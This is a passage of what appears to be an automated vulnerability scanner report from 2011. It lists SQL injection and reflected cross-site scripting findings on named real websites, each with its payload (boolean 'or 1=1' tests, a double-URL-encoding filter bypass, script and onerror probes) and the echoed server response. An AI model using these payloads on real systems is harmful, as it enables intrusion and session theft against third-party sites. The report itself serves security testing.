The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2> </body></html>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 52232181'%20or%201%3d1--%20 and 52232181'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /server-status on this server.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address> Server at www.alibris.com Port 8104</address> </body></html>
1.3. http://www.dogpile.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.dogpile.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10635560%20or%201%3d1--%20 and 10635560%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<script type="text/javascript"> //<![CDATA[ var addthis_pub="arfie"; var addthis_brand="Dogpile"; var addthis_header_color="#ffffff"; var addthis_header_background="#2244fe"; var addthis_options="email, favorites, facebook, myspace, twitter, digg, delicious, stumbleupon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/'; var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=d871434c075d4aa39d6d2a9503f1cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=7C85U0KGPmVPPafG1zJiGA%3D%3D&_IceUrl=true'; //]]> </script> <a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addt ...[SNIP]...
<script type="text/javascript"> //<![CDATA[ var addthis_pub="arfie"; var addthis_brand="Dogpile"; var addthis_header_color="#ffffff"; var addthis_header_background="#2244fe"; var addthis_options="email, favorites, facebook, myspace, twitter, digg, delicious, stumbleupon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/'; var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=1aeb70dcd7cc4a2781202a9503f1cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=x3eaeA9Nszsx12vh6l%2FEvw%3D%3D&_IceUrl=true'; //]]> </script> <a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 SN: 82 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 11:34:42 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... <h2>HTTP Error 404 - File or directory not found.<br> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found X-Powered-By: PHP/5.3.3 Status: 404 Not Found Content-Type: text/html; charset=utf-8 Server: Apache (Unix;) Content-Length: 19008 Vary: Accept-Encoding Date: Sat, 02 Apr 2011 11:43:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
1.7. http://www.rollingstone.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.rollingstone.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d530"><script>alert(1)</script>decd035a41f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba7b0"><script>alert(1)</script>aab5736d382 was submitted in the REST URL parameter 1. This input was echoed as ba7b0\"><script>alert(1)</script>aab5736d382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fbafe</title><script>alert(1)</script>51dc9727092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39315'%3balert(1)//cc506767d1e was submitted in the REST URL parameter 1. This input was echoed as 39315';alert(1)//cc506767d1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55ec1<script>alert(1)</script>09975e326de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.6. http://www.cliffsnotes.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cliffsnotes.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da647--><script>alert(1)</script>bbe399773e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e795"><script>alert(1)</script>bbd5bdf34b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9370'-alert(1)-'aa120cc403f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 782dd--><a>b8cbf55db90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Sat, 02 Apr 2011 11:46:30 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app2v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56207 Date: Sat, 02 Apr 2011 11:41:31 GMT X-Varnish: 877596055 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy1v.sb.lax1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <!-- page created on - 12-03-10, 08:52:39 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 server-status782dd--><a>b8cbf55db90 --> ...[SNIP]...
2.10. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.craveonline.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 89416--><a>aa1cc4eed48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Sat, 02 Apr 2011 11:45:36 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app1v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56279 Date: Sat, 02 Apr 2011 11:40:36 GMT X-Varnish: 877594024 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy1v.sb.lax1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <!-- page created on - 12-03-10, 08:52:39 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 server-status?89416--><a>aa1cc4eed48=1 --> ...[SNIP]...
2.11. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.craveonline.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1118e'-alert(1)-'e109d638d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13c5d<img%20src%3da%20onerror%3dalert(1)>c45223c93a6 was submitted in the REST URL parameter 1. This input was echoed as 13c5d<img src=a onerror=alert(1)>c45223c93a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ee74<script>alert(1)</script>9d7f21751d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.14. http://www.dummies.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dummies.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3afad--><script>alert(1)</script>b56567668b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7581b"><script>alert(1)</script>bc8d8474589 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.16. http://www.ecnext.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ecnext.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd672<script>alert(1)</script>127c627d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <br> Access Denied: http://www.ecnext.com/cd672<script>alert(1)</script>127c627d58 at Sat Apr 2 07:48:51 2011 from 173.193.214.243<br> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d5e"><script>alert(1)</script>e11ba8f4b87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/72d5e"><script>alert(1)</script>e11ba8f4b87 at Sat Apr 2 07:48:50 2011 from 173.193.214.243"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload e153f</title><script>alert(1)</script>e9fcdc9ddc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-statuse153f</title><script>alert(1)</script>e9fcdc9ddc5 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a564<script>alert(1)</script>98c0ca39ef5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-status1a564<script>alert(1)</script>98c0ca39ef5 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body {
...[SNIP]... <h1>/server-status1a564<script>alert(1)</script>98c0ca39ef5 not found on elyricsworld.com</h1> ...[SNIP]...
2.20. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elyricsworld.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload f0ca2</title><script>alert(1)</script>c3ed3e5c06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-status?f0ca2</title><script>alert(1)</script>c3ed3e5c06f=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body ...[SNIP]...
2.21. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elyricsworld.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0cc5<script>alert(1)</script>a9257fdb58c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body {
...[SNIP]... <h1>/server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 not found on elyricsworld.com</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58db4"%3b2273c575d86 was submitted in the REST URL parameter 1. This input was echoed as 58db4";2273c575d86 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6779"><script>alert(1)</script>65d93b08fbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 11:41:55 GMT Server: VoxCAST X-Powered-By: PHP/5.2.11 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from VoxCAST Content-Length: 40021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h ...[SNIP]... <input type="hidden" name="returl" value="http://www.inc.com/server-statuse6779"><script>alert(1)</script>65d93b08fbb"> ...[SNIP]...
2.24. http://www.inc.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.inc.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ce9"><script>alert(1)</script>cc34791a254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 883fe</script><script>alert(1)</script>8e095b000b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.26. http://www.kaboose.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kaboose.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 655aa</script><script>alert(1)</script>b38f926dd67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.27. http://www.manta.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e61d"><script>alert(1)</script>6cf64a7c5f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.28. http://www.manta.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f68f<script>alert(1)</script>2655fa9041f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.29. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf19d<script>alert(1)</script>223df9c9a1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.30. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a481e"><script>alert(1)</script>56fd9a4771c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.31. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2d9e7<script>alert(1)</script>e54763e1d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.32. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b442c"><script>alert(1)</script>236b91d1e55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.33. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c303<script>alert(1)</script>0fc6d39308a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.34. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3312a"><script>alert(1)</script>16834424f5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.35. http://www.manta.com/favicon.ico [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72f79<script>alert(1)</script>398c3c5f236 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.36. http://www.manta.com/favicon.ico [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17737"><script>alert(1)</script>b035543d8ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.37. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6996<script>alert(1)</script>b2a19b0fbd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.38. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec1a"><script>alert(1)</script>9ad62a2019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.39. http://www.manta.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec5a8"><script>alert(1)</script>bb89e044910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.40. http://www.manta.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2011<script>alert(1)</script>accfc3b90aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.2.41. http://www.mp3raid.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mp3raid.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d5a"><script>alert(1)</script>5bc6dc87344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e448<script>alert(1)</script>022d3f904ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /server-status8e448<script>alert(1)</script>022d3f904ba not found!</h1> ...[SNIP]...
2.43. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mp3raid.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78a93<script>alert(1)</script>a2ff6b3677d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /server-status?78a93<script>alert(1)</script>a2ff6b3677d=1 not found!</h1> ...[SNIP]...
2.44. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mp3raid.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1c2"><script>alert(1)</script>c7547c9425e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4419</script><script>alert(1)</script>dfe86b4c3ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0ec1'%3bc6711997946 was submitted in the REST URL parameter 1. This input was echoed as d0ec1';c6711997946 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.2.47. http://www.mylifetime.com/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mylifetime.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e89"><a>10ecc96fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.2.48. http://www.schoolfusion.us/server-status [REST URL parameter 1]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.schoolfusion.us
Path:
/server-status
Issue detail
